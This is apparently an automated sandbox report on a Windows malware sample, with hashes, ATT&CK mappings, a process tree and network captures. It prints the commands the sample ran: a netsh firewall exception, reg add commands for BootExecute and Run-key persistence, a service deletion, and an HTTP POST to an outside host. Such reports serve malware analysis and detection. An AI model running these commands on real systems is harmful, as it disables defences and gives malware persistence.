ca075adcc5423be5593de955e19ecedba3b99f45887e0412865f137bfd18d555 | Triage

Analysis

max time kernel
149s
max time network
123s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
03/01/2024, 13:24 UTC

Sharing

Report Analysis Logs

General

Target

3ea4252e1452dd305860829a8c586080.exe
Size

4.1MB
MD5

3ea4252e1452dd305860829a8c586080
SHA1

2a03733b26030e760f0fbf6a590b0e2ab5c46917
SHA256

ca075adcc5423be5593de955e19ecedba3b99f45887e0412865f137bfd18d555
SHA512

0688edb0f573550303c7772ea08b052006d7d50848fe49c422b66a1d12aa80e6515768fdbec35d420b900ee58688b554bdc364f0334b8bbd153e3755039cc05d
SSDEEP

98304:jTOhsfJwCcJnsgt1vdo08s2JpQpwh4Vlmfxl7K:jShKxcp99dIJpQp7LmW

Score

8^/10

evasion persistence

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 1 IoCs

Windows Service

pid	Process
2768	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Uses Session Manager for persistence 2 TTPs 3 IoCs

Creates Session Manager registry key to run executable early in system boot.

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\BootExecute = 6100750074006f0063006800650063006b0020006100750074006f00630068006b0020002a0000000000	reg.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\BootExecute = 6100750074006f0063006800650063006b0020006100750074006f00630068006b0020002a0000000000	reg.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Session Manager\BootExecute = 6100750074006f0063006800650063006b0020006100750074006f00630068006b0020002a0000000000	reg.exe

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows32 = "C:\\windows\\system\\system.exe"	3ea4252e1452dd305860829a8c586080.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	\??\c:\windows\SysWOW64\autoconvv.RRI	3ea4252e1452dd305860829a8c586080.exe
File opened for modification	\??\c:\windows\SysWOW64\autoconvv.RRI	3ea4252e1452dd305860829a8c586080.exe
File created	C:\Windows\SysWOW64\reg_0001.txt	3ea4252e1452dd305860829a8c586080.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32AntiDelete	3ea4252e1452dd305860829a8c586080.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2484	sc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
356	3ea4252e1452dd305860829a8c586080.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 356 wrote to memory of 2484	356	3ea4252e1452dd305860829a8c586080.exe	26
PID 356 wrote to memory of 2484	356	3ea4252e1452dd305860829a8c586080.exe	26
PID 356 wrote to memory of 2484	356	3ea4252e1452dd305860829a8c586080.exe	26
PID 356 wrote to memory of 2484	356	3ea4252e1452dd305860829a8c586080.exe	26
PID 356 wrote to memory of 2660	356	3ea4252e1452dd305860829a8c586080.exe	25
PID 356 wrote to memory of 2660	356	3ea4252e1452dd305860829a8c586080.exe	25
PID 356 wrote to memory of 2660	356	3ea4252e1452dd305860829a8c586080.exe	25
PID 356 wrote to memory of 2660	356	3ea4252e1452dd305860829a8c586080.exe	25
PID 356 wrote to memory of 2744	356	3ea4252e1452dd305860829a8c586080.exe	23
PID 356 wrote to memory of 2744	356	3ea4252e1452dd305860829a8c586080.exe	23
PID 356 wrote to memory of 2744	356	3ea4252e1452dd305860829a8c586080.exe	23
PID 356 wrote to memory of 2744	356	3ea4252e1452dd305860829a8c586080.exe	23
PID 356 wrote to memory of 2764	356	3ea4252e1452dd305860829a8c586080.exe	21
PID 356 wrote to memory of 2764	356	3ea4252e1452dd305860829a8c586080.exe	21
PID 356 wrote to memory of 2764	356	3ea4252e1452dd305860829a8c586080.exe	21
PID 356 wrote to memory of 2764	356	3ea4252e1452dd305860829a8c586080.exe	21
PID 356 wrote to memory of 2768	356	3ea4252e1452dd305860829a8c586080.exe	17
PID 356 wrote to memory of 2768	356	3ea4252e1452dd305860829a8c586080.exe	17
PID 356 wrote to memory of 2768	356	3ea4252e1452dd305860829a8c586080.exe	17
PID 356 wrote to memory of 2768	356	3ea4252e1452dd305860829a8c586080.exe	17

C:\Users\Admin\AppData\Local\Temp\3ea4252e1452dd305860829a8c586080.exe
"C:\Users\Admin\AppData\Local\Temp\3ea4252e1452dd305860829a8c586080.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:356
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall add allowedprogram C:\windows\system\system.exe RPCCC
  2⤵
  - Modifies Windows Firewall
  PID:2768
- C:\Windows\SysWOW64\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f
  2⤵
  - Uses Session Manager for persistence
  PID:2764
- C:\Windows\SysWOW64\reg.exe
  reg add "HKLM\SYSTEM\ControlSet002\Control\Session manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f
  2⤵
  - Uses Session Manager for persistence
  PID:2744
- C:\Windows\SysWOW64\reg.exe
  reg add "HKLM\SYSTEM\ControlSet001\Control\Session manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f
  2⤵
  - Uses Session Manager for persistence
  PID:2660
- C:\Windows\SysWOW64\sc.exe
  sc delete GbpSv
  2⤵
  - Launches sc.exe
  PID:2484

Network

DNS

www.lech.med.br

3ea4252e1452dd305860829a8c586080.exe

Remote address:

8.8.8.8:53

Request

www.lech.med.br

IN A

Response

www.lech.med.br

IN CNAME

lech.med.br

lech.med.br

IN A

144.217.240.28
POST

http://www.lech.med.br/imagens/img/index.php

3ea4252e1452dd305860829a8c586080.exe

Remote address:

144.217.240.28:80

Request

POST /imagens/img/index.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: www.lech.med.br
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

Response

HTTP/1.1 301 Moved Permanently

Date: Wed, 03 Jan 2024 13:24:29 GMT
Server: Apache
Location: https://www.lech.med.br/imagens/img/index.php
Content-Length: 253
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

144.217.240.28:80

http://www.lech.med.br/imagens/img/index.php

http

3ea4252e1452dd305860829a8c586080.exe

524 B
731 B
6
5

HTTP Request

POST http://www.lech.med.br/imagens/img/index.php

HTTP Response

301

8.8.8.8:53

www.lech.med.br

dns

3ea4252e1452dd305860829a8c586080.exe

61 B
91 B
1
1

DNS Request

www.lech.med.br

DNS Response

144.217.240.28

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Create or Modify System Process

Windows Service

Privilege Escalation

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Create or Modify System Process

Windows Service

Defense Evasion

Impair Defenses

Modify Registry

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

Replay Monitor

Loading Replay Monitor...

Downloads

memory/356-2-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-9-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-8-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-15-0x0000000074C50000-0x0000000074CA8000-memory.dmp

Filesize
352KB

Download
memory/356-18-0x0000000074C80000-0x0000000074C87000-memory.dmp

Filesize
28KB

Download
memory/356-17-0x0000000076120000-0x0000000076126000-memory.dmp

Filesize
24KB

Download
memory/356-16-0x0000000074C00000-0x0000000074C4F000-memory.dmp

Filesize
316KB

Download
memory/356-14-0x0000000075340000-0x000000007534C000-memory.dmp

Filesize
48KB

Download
memory/356-13-0x0000000077010000-0x0000000077100000-memory.dmp

Filesize
960KB

Download
memory/356-12-0x0000000077100000-0x000000007710A000-memory.dmp

Filesize
40KB

Download
memory/356-11-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/356-10-0x0000000075260000-0x0000000075269000-memory.dmp

Filesize
36KB

Download
memory/356-7-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-6-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-5-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-4-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-3-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-1-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-0-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-19-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-20-0x000000007EF50000-0x000000007EFAC000-memory.dmp

Filesize
368KB

Download
memory/356-22-0x0000000077100000-0x000000007710A000-memory.dmp

Filesize
40KB

Download
memory/356-21-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/356-23-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-24-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-25-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-26-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-27-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-28-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-29-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-31-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-32-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-34-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download
memory/356-35-0x0000000000400000-0x00000000008F3000-memory.dmp

Filesize
4.9MB

Download